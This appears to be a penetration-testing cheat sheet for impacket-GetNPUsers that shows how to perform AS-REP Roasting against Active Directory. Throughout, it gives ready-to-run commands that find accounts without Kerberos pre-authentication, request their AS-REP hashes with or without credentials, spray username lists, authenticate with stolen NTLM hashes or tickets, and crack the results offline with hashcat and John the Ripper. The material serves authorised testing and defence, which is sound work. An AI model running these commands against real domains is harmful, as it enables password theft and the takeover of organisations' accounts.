Skip to main content

Overview

impacket-GetNPUsers performs AS-REP Roasting by targeting accounts that have Kerberos pre-authentication disabled (DONT_REQUIRE_PREAUTH). The KDC returns an AS-REP encrypted with the user’s password hash, which can be cracked offline. 
impacket-GetNPUsers <DOMAIN>/<USER> [options]

With Valid Credentials

Enumerate all domain accounts with pre-auth disabled:

With Password

impacket-GetNPUsers domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

With NTLM Hash

impacket-GetNPUsers domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1
This queries LDAP for all accounts with UF_DONT_REQUIRE_PREAUTH. Add -request to actually fetch the AS-REP hashes — without it you only get the list of vulnerable accounts.

Without Credentials

When you have no valid domain credentials, supply a list of known or guessed usernames. No authentication is required because pre-auth is disabled for these accounts. 
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1
Note the trailing / after the domain with no username.

Single User (No Credentials)

impacket-GetNPUsers domain.local/svc_backup -no-pass -dc-ip 10.10.10.1

Request AS-REP for Specific User

With credentials, request the AS-REP hashes (use -usersfile with a single name to narrow the target). GetNPUsers has no -request-user flag — the positional account is the authenticating user, not the target: 
impacket-GetNPUsers domain.local/jdoe:'Password123' -request -dc-ip 10.10.10.1
Without credentials: 
impacket-GetNPUsers domain.local/svc_backup -no-pass -dc-ip 10.10.10.1

Output Format

Hashcat Format (Default)

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat
Output: 
[email protected]:abc123...

John Format

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format john
Output: 
[email protected]:abc123...

Save to File

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt

Cracking with Hashcat

AS-REP hashes use hashcat mode 18200: 
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Hash ModeDescription
18200Kerberos 5 AS-REP etype 23 (RC4)

With Rules

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

With John the Ripper

john asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt

From User List File

Build a username list and spray for AS-REP Roastable accounts: 
# users.txt — one username per line
# administrator
# svc_backup
# svc_sql
# krbtgt

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt
Accounts with pre-auth enabled return KDC_ERR_PREAUTH_REQUIRED (not vulnerable). Accounts that don’t exist return KDC_ERR_C_PRINCIPAL_UNKNOWN. Only vulnerable accounts return a hash.

Kerberos Authentication

Use an existing TGT to enumerate without NTLM: 
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetNPUsers domain.local/jdoe -k -no-pass -dc-host dc01.domain.local
When using -k, provide -dc-host with the FQDN instead of -dc-ip.

Quick Reference

# With credentials — list vulnerable accounts (no hashes)
impacket-GetNPUsers domain.local/jdoe:'Pass' -dc-ip 10.10.10.1

# With credentials — request the AS-REP hashes
impacket-GetNPUsers domain.local/jdoe:'Pass' -request -dc-ip 10.10.10.1

# Without credentials — test username list
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1

# Single user, no credentials
impacket-GetNPUsers domain.local/svc_backup -no-pass -dc-ip 10.10.10.1

# Save hashcat format
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt

# Save john format
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format john -outputfile asrep.txt

# With NTLM hash
impacket-GetNPUsers domain.local/jdoe -hashes :NTHASH -dc-ip 10.10.10.1

# With Kerberos
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetNPUsers domain.local/jdoe -k -no-pass -dc-host dc01.domain.local

# Crack
hashcat -m 18200 asrep.txt rockyou.txt
FlagDescription
-no-passDon’t require password (for unauthenticated requests)
-usersfile FILEFile with usernames to test (one per line)
-requestRequest AS-REP hash (required to get crackable output)
-format hashcat|johnOutput hash format (default: hashcat)
-outputfile FILESave hashes to file
-hashes LMHASH:NTHASHAuthenticate with NTLM hash
-aesKey KEYAuthenticate with AES key
-dc-ip IPDomain controller IP address
-dc-host HOSTDomain controller hostname (for Kerberos auth)
-kUse Kerberos authentication